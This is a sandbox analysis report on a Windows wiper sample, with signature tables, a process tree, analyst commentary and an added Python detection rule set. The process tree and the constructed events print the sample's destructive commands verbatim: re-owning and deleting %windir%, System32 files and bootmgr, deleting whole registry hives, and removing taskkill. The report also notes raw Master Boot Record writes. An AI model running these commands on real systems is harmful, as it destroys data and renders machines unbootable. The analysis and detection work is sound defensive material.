Analysis Overview
SHA256
34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0
Threat Level: Likely malicious
The file 34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0 was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Manipulates Digital Signatures
Drops file in Drivers directory
Executes dropped EXE
Modifies file permissions
Checks computer location settings
Reads user/profile data of web browsers
Boot or Logon Autostart Execution: Print Processors
Loads dropped DLL
Writes to the Master Boot Record (MBR)
Drops desktop.ini file(s)
Indicator Removal: File Deletion
Drops autorun.inf file
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Modifies registry key
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-12 15:17
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-12 15:17
Reported
2024-10-12 15:19
Platform
win7-20241010-en
Max time kernel
120s
Max time network
16s
Command Line
Signatures
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\wintrust.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wintrust.dll | C:\Windows\system32\cmd.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Boot or Logon Autostart Execution: Print Processors
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\spool\prtprocs\x64\winprint.dll | C:\Windows\system32\cmd.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\assembly\Desktop.ini | C:\Windows\system32\cmd.exe | N/A |
Indicator Removal: File Deletion
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0.exe | N/A |
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-s..ccessagent-binaries_31bf3856ad364e35_6.1.7600.16385_none_de06b4fbd5b45f78\autorun.inf | C:\Windows\system32\cmd.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\spool\prtprocs\x64\winprint.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\webservices.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\advapi32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wintrust.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\msctf.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\audiosrv.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\SAM~1.LOG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\hid.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\msv1_0.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI62D3~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\iertutil.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\lpk.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\9w3j6e.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\HARDWA~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\msvcrt.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\localspl.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\upnp.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\IconCodecService.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\ws2_32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\nsi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\atl.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\cryptui.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\difxapi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\dnsapi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\rasdlg.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\scecli.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\acppage.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\imm32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\FXSAPI.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\UIAnimation.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\umpnpmgr.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\LogFiles\WMI\RtBackup\ETWRTD~1.ETL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\EhStorShell.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\browser.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\ncsi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\pnrpnsp.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\wscui.cpl | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\es.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\wbem\wbemprox.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\WSHTCPIP.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\hcproviders.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\devobj.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\wbem\wmiutils.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MICA77~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\api-ms-win-downlevel-ole32-l1-1-0.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\TxR\{01688~2.BLF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\imm32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\duser.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\WindowsCodecs.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MIBED6~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winmm.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\vssapi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\SOFTWA~1.LOG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\spoolsv.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\comctl32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\dllhost.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI319B~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI7771~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\RegBack\SYSTEM | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\TxR\{01688~3.REG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\gameux.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\sxssrv.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\vsstrace.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\kernel32.dll | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\Desktop | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM6A9E~1.163\rasadhlp.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMF869~1.163\sechost.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\BitLockerDiscoveryVolumeContents\ko-KR_BitLockerToGo.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_3369~1 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRDDAB~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\UIAUTO~1 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Fonts\tahomabd.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM7188~1.175\wiarpc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMC999~1.175\winhttp.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM1148~1.175\umb.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\WO58AE~1.163\normaliz.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\BitLockerDiscoveryVolumeContents\nb-NO_BitLockerToGo.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM517E~1.163\WSDMon.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM1CCF~1.163\msutb.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\debug\PASSWD.LOG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\LOCALS~1\NTUSER~2.LOG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\LOCALS~1\NTUSER~1.REG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AME0F9~1.175\credssp.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM71EE~1.175\WMIsvc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM9C03~1.175\wbemsvc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\BitLockerDiscoveryVolumeContents\it-IT_BitLockerToGo.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\BitLockerDiscoveryVolumeContents\tr-TR_BitLockerToGo.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SYSTEM~4 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\SY2C2F~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\inficon.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_6.1.7601.17514_sl-si_3e801d820cb4f389\SL-SI_~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Tasks\SCHEDLGU.TXT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_6.1.7601.17514_hu-hu_412532939d54c9f8\HU-HU_~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_6.1.7601.17514_tr-tr_e55b2bd8fce5fac8\TR-TR_~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM3E1F~1.175\msxml6.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\X89CF7~1.164\iertutil.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\BitLockerDiscoveryVolumeContents\fi-FI_BitLockerToGo.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\LOCALS~1\Pictures | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMEEB9~1.175\msasn1.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM734B~1.175\ntdll.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM1B25~1.175\lsm.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMFF97~1.163\version.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM66CA~1.175\comctl32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_6.1.7601.17514_fi-fi_f61840f9bb3cd6a4\FI-FI_~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMB4A2~1.175\gpsvc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMEB0A~1.175\IPHLPAPI.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\WODA86~1.175\shell32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\WPFGFX~2.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\oisicon.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Web\WALLPA~1\Nature | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM4F52~1.175\aelupsvc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM37B2~1.163\basesrv.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM3E37~1.175\ole32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM1080~1.175\devobj.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM9C34~1.163\msiltcfg.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM5CF3~1.163\Syncreg.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_6.1.7601.17514_bg-bg_68d21d71f179ba4c\BG-BG_~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Media\Festival | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMC1F8~1.163\WlS0WndH.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\E8EBCC90469BFE03EA485673BA14799F\4.7.3062\PRESEN~2.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\Music | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMFD37~1.175\locale.nls | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM66D9~1.175\SYNCCE~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM7755~1.175\netshell.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM2FAB~1.175\localspl.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AMCEB1~1.175\shdocvw.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\winsxs\AM9C03~1.175\FRAMED~1.DLL | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0.exe
"C:\Users\Admin\AppData\Local\Temp\34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f %windir%\System32\Taskkill.exe >nul 2>nul && icacls %windir%\System32\Taskkill.exe /grant administrators:F >nul 2>nul
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Taskkill.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Taskkill.exe /grant administrators:F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /s /f /q %windir%\System32\Taskkill.exe >nul 2>nul
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f %windir%\System32\Tskill.exe >nul 2>nul && icacls %windir%\System32\Tskill.exe /grant administrators:F >nul 2>nul
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Tskill.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Tskill.exe /grant administrators:F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /s /f /q %windir%\System32\Tskill.exe >nul 2>nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f %windir%\*.* >nul 2>nul && icacls %windir%\*.* /grant administrators:F >nul 2>nul
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\*.*
C:\Windows\system32\icacls.exe
icacls C:\Windows\*.* /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f %windir%\System32\*.* >nul 2>nul && icacls %windir%\System32\*.* /grant administrators:F >nul 2>nul
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\*.*
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\*.* /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCR/* /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCR/* /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCR/.exe /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCR/.exe /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCR/exefile /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCR/exefile /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCR/.dll /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCR/.dll /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCU/* /va /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCU/* /va /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKLM/* /va /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKLM/* /va /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKU/* /va /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKU/* /va /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCC/* /va /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCC/* /va /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f C:\bootmgr >nul 2>nul && icacls C:\bootmgr /grant administrators:F >nul 2>nul && attrib -s -h -r C:\bootmgr
C:\Windows\system32\takeown.exe
takeown /f C:\bootmgr
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /s /f /q C:\bootmgr >nul 2>nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q /a %windir% >nul 2>nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rd /s /q %windir% >nul 2>nul
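Reading the process tree as a whole rather than signature by signature: the sample never writes the system files itself. It spawns cmd.exe to take ownership of and re-ACL taskkill.exe and tskill.exe and delete them (presumably so the running chain cannot be stopped), repeats takeown /f and icacls /grant administrators:F over %windir%\*.*, %windir%\System32\*.* and C:\bootmgr, issues reg delete against whole hive roots and the .exe/.dll/exefile class keys, then runs del /s /f /q /a %windir% and rd /s /q %windir%. The many "File opened for modification" hits above (wintrust.dll, winprint.dll, the autorun.inf files, the drivers directory in behavioral2) are consistent with that blanket sweep, and the Files section records nothing beyond a memory dump, so they are better read as side effects of the ACL changes and deletions than as targeted signature or print-processor tampering. The reg delete targets use forward slashes, which reg.exe does not accept as key separators, so those invocations most likely fail; the "Modifies registry key" signature only records that reg.exe ran. The one action the sample performs directly is opening \??\PhysicalDrive0, which command-line telemetry will not see and needs raw-disk handle monitoring instead.

The following is an added example and not part of the sandbox report: a small rule set over Sysmon-style process-creation records that catches this chain and correlates the hits back to the root process. The event records are constructed from the process tree above (PID 1664 comes from the memory dump name; the other PIDs, the parent links and the two benign admin commands are assumptions), and the ATT&CK technique IDs are my mapping, not the report's.

```python
"""Detect the takeown -> icacls -> del/rd wiper chain from the process tree above.
Added example, not code from the sandbox report. Events are constructed."""
import re
from collections import defaultdict

# Locations that no legitimate installer re-owns, re-ACLs or deletes wholesale.
PROTECTED = r"(%windir%|%systemroot%|c:\\windows|c:\\bootmgr)(?=[\\\s*]|$)"

# (rule name, ATT&CK technique, pattern over the full command line).
RULES = [
    ("takeown_protected", "T1222.001",
     re.compile(r"\btakeown(\.exe)?\b.*\s/f\s+" + PROTECTED, re.I)),
    ("icacls_grant_protected", "T1222.001",
     re.compile(r"\bicacls(\.exe)?\b\s+" + PROTECTED + r"\S*\s.*/grant\b", re.I)),
    ("delete_protected", "T1485",
     re.compile(r"\b(del|erase|rd|rmdir)\b.*\s/s\b.*\s" + PROTECTED, re.I)),
    ("reg_delete_hive_root", "T1112",
     re.compile(r"\breg(\.exe)?\s+delete\s+(HKCR|HKCU|HKLM|HKU|HKCC|HKEY_[A-Z_]+)[\\/]\*", re.I)),
    ("reg_delete_exe_assoc", "T1112",
     re.compile(r"\breg(\.exe)?\s+delete\s+(HKCR|HKEY_CLASSES_ROOT)[\\/](\.exe|exefile|\.dll)(\s|$)", re.I)),
    ("remove_taskkill", "T1562.001",
     re.compile(r"\b(takeown|icacls|del)\b.*\\(taskkill|tskill)\.exe", re.I)),
]

# Constructed Sysmon Event ID 1-style records: (pid, ppid, image, command line).
# Transcribed from the process tree above; PIDs other than 1664 are assumed.
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0.exe"
EVENTS = [
    (1664, 1200, SAMPLE, f'"{SAMPLE}"'),
    (1700, 1664, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c takeown /f %windir%\System32\Taskkill.exe >nul 2>nul && icacls %windir%\System32\Taskkill.exe /grant administrators:F >nul 2>nul'),
    (1708, 1700, r"C:\Windows\system32\takeown.exe", r"takeown /f C:\Windows\System32\Taskkill.exe"),
    (1716, 1700, r"C:\Windows\system32\icacls.exe", r"icacls C:\Windows\System32\Taskkill.exe /grant administrators:F"),
    (1724, 1664, r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c del /s /f /q %windir%\System32\Taskkill.exe >nul 2>nul'),
    (1732, 1664, r"C:\Windows\system32\cmd.exe", r"C:\Windows\system32\cmd.exe /c takeown /f %windir%\System32\*.* >nul 2>nul && icacls %windir%\System32\*.* /grant administrators:F >nul 2>nul"),
    (1740, 1664, r"C:\Windows\system32\cmd.exe", r"C:\Windows\system32\cmd.exe /c reg delete HKCR/* /f >nul 2>nul"),
    (1748, 1740, r"C:\Windows\system32\reg.exe", r"reg delete HKCR/* /f"),
    (1756, 1664, r"C:\Windows\system32\cmd.exe", r"C:\Windows\system32\cmd.exe /c reg delete HKCR/.exe /f >nul 2>nul"),
    (1764, 1664, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c takeown /f C:\bootmgr >nul 2>nul && icacls C:\bootmgr /grant administrators:F >nul 2>nul && attrib -s -h -r C:\bootmgr'),
    (1772, 1664, r"C:\Windows\system32\cmd.exe", r"C:\Windows\system32\cmd.exe /c rd /s /q %windir% >nul 2>nul"),
    # Constructed benign admin activity under a different parent: must not alert.
    (2000, 900, r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c icacls C:\Users\Admin\Documents /grant Admin:F'),
    (2008, 900, r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c del /q C:\Windows\Temp\setup.log'),
]


def match_rules(cmdline):
    """Return the (rule, technique) pairs whose pattern matches one command line."""
    return [(name, tech) for name, tech, rx in RULES if rx.search(cmdline)]


def root_of(pid, parent):
    """Walk ppid links up to the first process whose parent is not in the log."""
    while parent.get(pid) in parent:
        pid = parent[pid]
    return pid


def correlate(events, min_rules=3):
    """Group rule hits by root ancestor. A root that trips at least min_rules
    distinct rules, one of them a destructive delete, is reported as a wiper chain."""
    parent = {pid: ppid for pid, ppid, _, _ in events}
    hits = defaultdict(dict)  # root pid -> {rule name: technique}
    for pid, _, _, cmd in events:
        for name, tech in match_rules(cmd):
            hits[root_of(pid, parent)][name] = tech
    verdicts = {}
    for root, rules in hits.items():
        verdicts[root] = {
            "rules": sorted(rules),
            "techniques": sorted(set(rules.values())),
            "wiper_chain": len(rules) >= min_rules and "delete_protected" in rules,
        }
    return verdicts


if __name__ == "__main__":
    for root, v in correlate(EVENTS).items():
        print(root, "WIPER CHAIN" if v["wiper_chain"] else "suspicious", v["rules"])
```

Each rule keys on the protected path, not just the tool name, so the benign icacls on a user folder and the single-file del under Windows\Temp produce no hit while every stage of the tree above does. The correlation step matters more than any one rule: takeown and icacls on System32 are individually noisy in some environments, but six distinct stages under one root process within a couple of minutes is not. Recursive deletes under %windir% subfolders such as Temp will also trip delete_protected, so an allowlist for those paths is the first tuning an analyst would add.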
Network
Files
memory/1664-0-0x0000000000400000-0x000000000040D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-12 15:17
Reported
2024-10-12 15:19
Platform
win10v2004-20241007-en
Max time kernel
139s
Max time network
125s
Command Line
Signatures
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\udfs.sys | C:\Windows\system32\cmd.exe | N/A |
